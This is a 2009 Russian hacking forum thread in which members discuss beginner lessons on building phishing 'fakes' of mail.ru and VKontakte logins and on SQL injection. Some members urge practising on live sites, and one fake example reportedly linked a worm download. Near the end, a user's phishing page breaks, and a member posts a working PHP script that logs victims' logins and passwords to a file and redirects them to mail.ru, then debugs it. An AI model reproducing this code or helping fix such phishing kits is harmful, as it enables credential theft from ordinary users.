Обсуждение уроков группы 9009
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Обсуждение уроков группы 9009 - 2009-05-11 14:50:05.103333
|
|
|
Neveral
Сообщений: 282
Оценки: 0
Присоединился: 2009-02-10 11:51:27.530000
|
Здесь можете задавать любые вопросы касающиеся уроков нашей группы. Уроки найдете здесь http://forum.xakep.ru/m_1507291/tm.htm
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-12 00:21:02.373333
|
|
|
Duhas
Сообщений: 125
Оценки: 0
Присоединился: 2009-03-12 16:33:18.890000
|
Спасибо очень познавательные уроки как опробую фейк отпишусь:)
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-12 00:44:42.283333
|
|
|
Mr_Naeba
Сообщений: 2709
Оценки: 0
Присоединился: 2008-07-23 14:21:27.243333
|
закрепил тему.
не подкачайте
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-13 10:21:43.383333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Да… Я смотрю, народ не очень интересуется уроками. Всего один отзыв, ни одного предложения… Или все форумчане уже такие профи, что им это не надо? А то все спрашивали, когда же группа начнет работать.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-13 10:44:58.830000
|
|
|
lezg1n
Сообщений: 10
Оценки: 0
Присоединился: 2008-10-03 23:30:28.956666
|
Просто в уроке все доходчиво и понятно объяснено по этому ни кто и не пишет, а так молодцы. Жду следующих уроков. С удовольствием их буду читать и практиковаться.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-13 14:00:42.463333
|
|
|
Ramonlord
Сообщений: 46
Оценки: 0
Присоединился: 2009-01-07 16:39:46.463333
|
horiz, Neveral, урок на высшем уровне!!!
Если не затруднит сказать, то какой следующий урок будет?или секрет пока?
Лично я бы хотел, чтобы подробней была рассмотрена sql inj(я как раз щас с этой уязвимостью вожусь, много что уже становится понятным), но конечно что писать дальше, решать только вам))) Спасибо!!!
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-13 14:26:18.840000
|
|
|
Neveral
Сообщений: 282
Оценки: 0
Присоединился: 2009-02-10 11:51:27.530000
|
quote:
ORIGINAL: Ramonlord
horiz, Neveral, урок на высшем уровне!!!
Если не затруднит сказать, то какой следующий урок будет?или секрет пока?
Лично я бы хотел, чтобы подробней была рассмотрена sql inj(я как раз щас с этой уязвимостью вожусь, много что уже становится понятным), но конечно что писать дальше, решать только вам))) Спасибо!!!
horiz кат раз скоро эту статью выложит, она уже готова.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-13 20:15:22.563333
|
|
|
Revival1002
Сообщений: 96
Оценки: 0
Присоединился: 2009-02-28 18:09:51.870000
|
Всегда поддерживал самодеятельность))) Ребята молодцы, всегда надо учить новичков. Рад видеть что группа 9009 работает.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-13 20:20:32.356666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Поддерживаю, может меньше станет глупых вопросов/тем/постов и возрастет профессиональный уровень форума
ЗЫЖ Вперёд, ребята, планету хакерам!
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-13 21:54:00.766666
|
|
|
Тайлер Дердон
Сообщений: 88
Оценки: 0
Присоединился: 2009-05-07 08:20:33.450000
|
Хороший урок не спорю…а можно ещё видео-уроков по больше…просто иногда лучше один раз увидеть чем сто раз прочитать…
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-14 16:00:58.193333
|
|
|
Neveral
Сообщений: 282
Оценки: 0
Присоединился: 2009-02-10 11:51:27.530000
|
quote:
ORIGINAL: Тайлер Дердон
Хороший урок не спорю…а можно ещё видео-уроков по больше…просто иногда лучше один раз увидеть чем сто раз прочитать…
Ну я думаю видеоурок по фейкам делать не надо, я там и так все расписал подробно, сложного ничего нет.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-14 16:33:03.453333
|
|
|
Тайлер Дердон
Сообщений: 88
Оценки: 0
Присоединился: 2009-05-07 08:20:33.450000
|
quote:
ORIGINAL: Neveral
quote:
Ну я думаю видеоурок по фейкам делать не надо, я там и так все расписал подробно, сложного ничего нет.
Не обязательно про фейк, можно что либо иное.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-14 20:09:30.766666
|
|
|
Revival1002
Сообщений: 96
Оценки: 0
Присоединился: 2009-02-28 18:09:51.870000
|
Вот и второй урок. Завтра буду его изучать))) Ток в у меня в Apache+PHP+MySQL. MySQL не работает((( Тупо не запускается(((
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-14 20:11:59.066666
|
|
|
Ramonlord
Сообщений: 46
Оценки: 0
Присоединился: 2009-01-07 16:39:46.463333
|
horiz , прочитал урок по sql inj, скажу честно, что более понятной статьи ,по этой уязвимости, я в инете ещё не видел!!!!
Продолжайте в том же духе!!!
Revival1002 , у меня то же самое было… Просто поставил Денвер и всё заработало)))
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-14 20:16:29.783333
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
sql-inject
Норм написал, в общем зачет.
Тема большая,(различные СУБД.,обход фильтрации.,заливка шела итд…..)так что думаю это не последний урок от тебя.
PS.Хотя ссылочку с FAQ моно было подкинуть http://forum.antichat.ru/thread104591.html
Может у когонить будет желания почитать……
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-14 22:48:01.646666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
ORIGINAL: farex
Тема большая,(различные СУБД.,обход фильтрации.,заливка шела итд…..)так что думаю это не последний урок от тебя.
Да, тема действительно болшая, есть о чем писать, о скулах уроки обязательно будут.
Всем
Можете здесь предлагать новые темы для уроков. Группа их рассмотрит.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-15 11:33:04.750000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Парочка замечаний по скуль уроку.
1. Имхо, лучше рассматривать пример на реальном сайте. Уверен, что, как минимум 50% новичков не будут ради этого заморачиваться с апачем.
2. А что с комментарием? ^^
3. Новичок, прочитав твою статью так и не поймет, как найти инъекцию.
4. Ты рассказываешь о переводе текста в шестнадцатеричное представление, но не рассказываешь как это сделать. В итоге - ещё одна стена для новичка.
5. Ну и вообще, в целом, статья не полная.
В итоге: пока особых различий не заметил.
Если хочешь сделать статью понятной для новичков, предлагаю найти сайт, на котором есть скуль, но при этом с сайтом ничего нельзя сделать ) И уже на нем показывать рабочий пример, со скринами, чтобы любой мог зайти и попробовать повторить.
Так же предлагаю, писать статью по определенному плану. К примеру:
1. Поиск скули. (Все возможные варианты)
2. Раскрутка скули, с рассмотрением всех возможный трудностей. (экранирование кавычек, кавычка в запросе, фильтрация символов, и т.д.)
3. Вывод инфы, с рассмотрением всех возможный трудностей. (кодировка, таблица в другой бд и т.д.)
4. Блинд инъекция.
5. Дополнительные возможности (group_concat, подзапросы и т.д.)
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-15 12:00:58.060000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
r1dex
quote:
2. А что с комментарием? ^^
3. Новичок, прочитав твою статью так и не поймет, как найти инъекцию.
4. Ты рассказываешь о переводе текста в шестнадцатеричное представление, но не рассказываешь как это сделать. В итоге - ещё одна стена для новичка.
5. Ну и вообще, в целом, статья не полная.
При написании статьи, я не ставил перед собой цель описать все. Я хотел дать новичкам общее представление, так что же такое скули в принципе. Все тонкости я буду обсуждать в последующих уроках.
quote:
1. Имхо, лучше рассматривать пример на реальном сайте. Уверен, что, как минимум 50% новичков не будут ради этого заморачиваться с апачем.
Если новички хотят учиться, то без апача они не обойдутся никак. Я решил, что перед тем как лезть в сеть надо опробовать и прочувствовать все тонкости на локалхосте.
quote:
1. Поиск скули. (Все возможные варианты)
2. Раскрутка скули, с рассмотрением всех возможный трудностей. (экранирование кавычек, кавычка в запросе, фильтрация символов, и т.д.)
3. Вывод инфы, с рассмотрением всех возможный трудностей. (кодировка, таблица в другой бд и т.д.)
4. Блинд инъекция.
5. Дополнительные возможности (group_concat, подзапросы и т.д.)
Я так и собираюсь писать. Часть этого я уже описал, но опубликовывать еще рано.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-15 12:08:33.086666
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
quote:
Если новички хотят учиться, то без апача они не обойдутся никак. Я решил, что перед тем как лезть в сеть надо опробовать и прочувствовать все тонкости на локалхосте.
Всех тонкостей на локалхосте не прочувствуешь……..
ТЕОРИЯ+ПРАКТИКА(в сети)+ЛОКАЛХОСТ –> ИМХО
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-15 12:10:21.610000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
При написании статьи, я не ставил перед собой цель описать все. Я хотел дать новичкам общее представление, так что же такое скули в принципе. Все тонкости я буду обсуждать в последующих уроках.
Т.е. по-твоему "скули в принципе" - это раскрутка 5-ой ветки?
При том, что ни один новичок не сможет повторить этот урок, хотябы потому, что не сможет захексить таблицу )
quote:
Если новички хотят учиться, то без апача они не обойдутся никак. Я решил, что перед тем как лезть в сеть надо опробовать и прочувствовать все тонкости на локалхосте.
Ну я без локалхоста учился - не жалуюсь ^^
К тому же, это лишний гемор.
Хотелось бы узнать, ты собираешься делать одну большую статью? Или разбивать все на отдельные уроки?
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-15 12:25:43.226666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
ORIGINAL: farex
ТЕОРИЯ+ПРАКТИКА(в сети)+ЛОКАЛХОСТ –> ИМХО
Не спорю, но для начала лучше ограничиться локалхостом.
quote:
ORIGINAL: r1dex
Т.е. по-твоему "скули в принципе" - это раскрутка 5-ой ветки?
Интересно, а на какой ветке мне надо было строить пример? На 4-ой?
"Берем брутер и брутим имена баз, таблиц и столбцов".
quote:
ORIGINAL: r1dex
При том, что ни один новичок не сможет повторить этот урок, хотябы потому, что не сможет захексить таблицу )
Почему не сможет? Я же привел хексы для таблиц и столбцов из примера.
quote:
ORIGINAL: r1dex
Хотелось бы узнать, ты собираешься делать одну большую статью? Или разбивать все на отдельные уроки?
Я собираюсь сделать еще 4-5 уроков по этой теме. Все будет зависить от их востребованности.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-15 12:30:59.886666
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
quote:
Почему не сможет? Я же привел хексы для таблиц и столбцов из примера.
Не но тут моно было бы посоветовать какуюнить тулзу для перевода в 16й код или в CHAR.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-15 12:37:48.140000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
Не спорю, но для начала лучше ограничиться локалхостом.
Для того, кто занимается этим впервые будет не так интересно, чем если бы был "живой" пример.
quote:
Интересно, а на какой ветке мне надо было строить пример? На 4-ой?
"Берем брутер и брутим имена баз, таблиц и столбцов".
Прочитав статью, можно подумать, что все скули так и крутятся.
Если ты хотел объяснить "скули в принципе", то нужно было объяснить логику запросов и как извлекаются данные. И все.
А если ты показываешь на пример, то по крайней мере нужно указать, что есть 4-ая и 3-яя ветка, в которых нет information_schema. А ещё лучше показать пример сразу на 4-ой и 5-ой ветке.
Ради интереса, посчитай на ачате, сколько раз люди в 4-ой ветке ищут information_schema.
quote:
Почему не сможет? Я же привел хексы для таблиц и столбцов из примера.
Как он догадается, как хексить?
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-15 12:39:48.560000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
farex Я потом приведу скрипт в 5 строчек. Ведь настоящий хакер должен уметь все создавать сам ;)
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-15 12:50:00.716666
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
quote:
farex Я потом приведу скрипт в 5 строчек. Ведь настоящий хакер должен уметь все создавать сам
Я и не спорю, я сам написал скрипт для перевода в CHAR(код)…..
А потом понял что изобрел велосипед и зря потратил время, потому как в сети полно подобных скриптов, онлайн сервисов и тулз.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-15 13:19:32.906666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
r1dex живые примеры будут дальше.
quote:
А если ты показываешь на пример, то по крайней мере нужно указать, что есть 4-ая и 3-яя ветка, в которых нет information_schema.
По-мойму я указал, что инф.схема есть начиная с пятой версии.
quote:
Как он догадается, как хексить?
А вот это будет обсуждаться в следующих уроках. А для того, что бы просто понять принцип изменения логики запроса, знать это совсем не обязательно.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-15 13:47:11.640000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
По-мойму я указал, что инф.схема есть начиная с пятой версии.
По твоему мнению, новичок не полезет искать в 4-ой ветке инф.схему, потому, что ты написал "В MySQL>=5 есть такая прекрасная вещь, как information_schema."?
Это первый урок, в нём как раз и необходимо указать, что есть версия 3 и 4, и, соответвенно их возможности.
quote:
А вот это будет обсуждаться в следующих уроках. А для того, что бы просто понять принцип изменения логики запроса, знать это совсем не обязательно.
Т.е. этот урок чисто для теоретиков?
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-15 17:44:28.176666
|
|
|
Revival1002
Сообщений: 96
Оценки: 0
Присоединился: 2009-02-28 18:09:51.870000
|
В будущих уроках хотелось бы услышать о DDoS, PHP-include. А вообще спасибо за уроки!!!
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-15 21:41:24.203333
|
|
|
deemon2008
Сообщений: 14
Оценки: 0
Присоединился: 2008-12-21 01:27:51.586666
|
Хотелось бы увидеть урок по metasploit…
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-16 10:44:54.830000
|
|
|
Ramonlord
Сообщений: 46
Оценки: 0
Присоединился: 2009-01-07 16:39:46.463333
|
r1dex , да ладно те критиковать…Человек пишет,старается)))А в будующих уроках(если в этом что-то и было не так),я уверен,всё будет дополнено и исправлено)))Лично мне, очень нравятся уроки группы9009, с удовольствием изучаю)))Большое спасибо!!!
А на счёт следубщей темы…Всётаки хочется услышать про DDOS!!))
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-16 11:14:51.226666
|
|
|
nice_boy
Сообщений: 50
Оценки: 0
Присоединился: 2008-11-23 14:37:48.036666
|
Уроки отличные, про фейки новичёк поймёт, да там в принципе понимать нечего, а вот про инъекцию всё такое тяжеловато будет
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-16 11:39:41.180000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
nice_boy, можешь написать, в чем именно урок про скули показался тебе тяжелым? Учту для будущих уроков.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-16 15:09:12.376666
|
|
|
Neveral
Сообщений: 282
Оценки: 0
Присоединился: 2009-02-10 11:51:27.530000
|
quote:
ORIGINAL: nice_boy
Уроки отличные, про фейки новичёк поймёт, да там в принципе понимать нечего, а вот про инъекцию всё такое тяжеловато будет
На счет скулей согласен, но horiz все написал хорошо, просто тема сама по себе тяжеловата..
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-16 17:13:44.950000
|
|
|
Mr_Naeba
Сообщений: 2709
Оценки: 0
Присоединился: 2008-07-23 14:21:27.243333
|
неверал, ять.
что за хрень у тебя в прмерах фейка?
в фейке контакта предлагают скачать червя, а в фейке мыла - кривой фейк контакта. настолько кривой, что отпадает всякое желание такиеже делать. исправь)
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-16 18:35:30.010000
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
quote:
deemon2008
Хотелось бы увидеть урок по metasploit…
Вот => Дедик или поможет нам Metasploit 3.2 <=
Подробнея мана,я не встречал……….
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-16 22:37:23.620000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
r1dex , да ладно те критиковать…Человек пишет,старается)))А в будующих уроках(если в этом что-то и было не так),я уверен,всё будет дополнено и исправлено)))Лично мне, очень нравятся уроки группы9009, с удовольствием изучаю)))Большое спасибо!!!
А на счёт следубщей темы…Всётаки хочется услышать про DDOS!!))
Чем больше критики, тем лучше для автора.
Конечно, если критика оправданна.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-17 05:52:17.280000
|
|
|
Neveral
Сообщений: 282
Оценки: 0
Присоединился: 2009-02-10 11:51:27.530000
|
quote:
ORIGINAL: Mr_Naeba
неверал, ять.
что за хрень у тебя в прмерах фейка?
в фейке контакта предлагают скачать червя, а в фейке мыла - кривой фейк контакта. настолько кривой, что отпадает всякое желание такиеже делать. исправь)
А )), убрал пока ссылки на время, я там просто экспериментировал для новой статьи и забыл линки убрать.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-17 13:55:06.803333
|
|
|
Black Jack
Сообщений: 10
Оценки: 0
Присоединился: 2008-11-11 18:43:09.313333
|
Сделал фейк все, как написано.
При заходе на фиктивную страничку и ввода логина и пароля пишет:
Parse error: parse error, unexpected T_STRING in d:\hst\maill-org_fffcf98e\http\log.php on line 8
содержимое log.php скопировано полностью из поста.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-17 14:41:06.443333
|
|
|
Neveral
Сообщений: 282
Оценки: 0
Присоединился: 2009-02-10 11:51:27.530000
|
quote:
ORIGINAL: Black Jack
Сделал фейк все, как написано.
При заходе на фиктивную страничку и ввода логина и пароля пишет:
Parse error: parse error, unexpected T_STRING in d:\hst\maill-org_fffcf98e\http\log.php on line 8
содержимое log.php скопировано полностью из поста.
Попробуй поставь на файл base.php права доступа 777 (открытие,чтение, запись для всех)
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-05-17 15:56:46.236666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Neveral, Black Jack
quote:
<?
$Login = $_POST['login']; // Логин
$Pass = $_POST['pass']; // Пароль
$Domen = $_POST['dm']; // Домен
$log = fopen("baza.php","a+"); //открываем файл хранилища
fwrite($log,"<br> $Login:$Pass$Domen \n"); //записываем всё что надо в него
fclose($log); //закрываем хранилище
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://mail.ru'></head></html>"; перенаправляем на исходную страницу маил.ру
?>
По-мойму дело здесь в том, что строка перенаправляем на исходную страницу маил.ру не погашена коментарием.
|
|
|
|
|
|
